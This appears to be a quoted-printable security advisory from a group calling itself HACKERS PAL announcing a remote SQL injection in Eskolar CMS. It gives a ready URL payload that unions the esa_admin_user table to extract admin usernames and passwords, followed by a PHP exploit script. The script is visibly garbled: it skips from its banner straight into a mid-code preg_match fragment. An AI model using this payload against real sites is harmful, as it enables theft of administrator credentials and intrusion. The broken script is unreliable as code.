|
Hello,,=0D
=0D
Eskolar CMS Remote Sql Injection=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D
Email Address : security@soqor.net=0D
=0D
=0D
Remote Sql injection :-=0D
/index.php?gr_1_id=0&gr_2_id=0&gr_3_id=1&doc_id=10%20union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,user,18,19,20,21,22,23,24,25,26%20FROM%20esa_admin_user/*=0D
=0D
Exploit:=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
=0D
/*=0D
/* Eskolar CMS Remote sql injection exploit=0D
/* By : HACKERS PAL=0D
/* WwW.SoQoR.NeT=0D
*/=0D
print_r('=0D
/**********************************************/=0D
/* Eskolar CMS Remote sql injection exploit */=0D
/* by HACKERS PAL
(.+?)<\/a> <\/td>/is',$page))=0D
{=0D
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D
}=0D
=0D
preg_replace_callback('/\ (.+?)<\/a> <\/td>/is','get',$page);=0D
=0D
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D
?>=0D
#WwW.SoQoR.NeT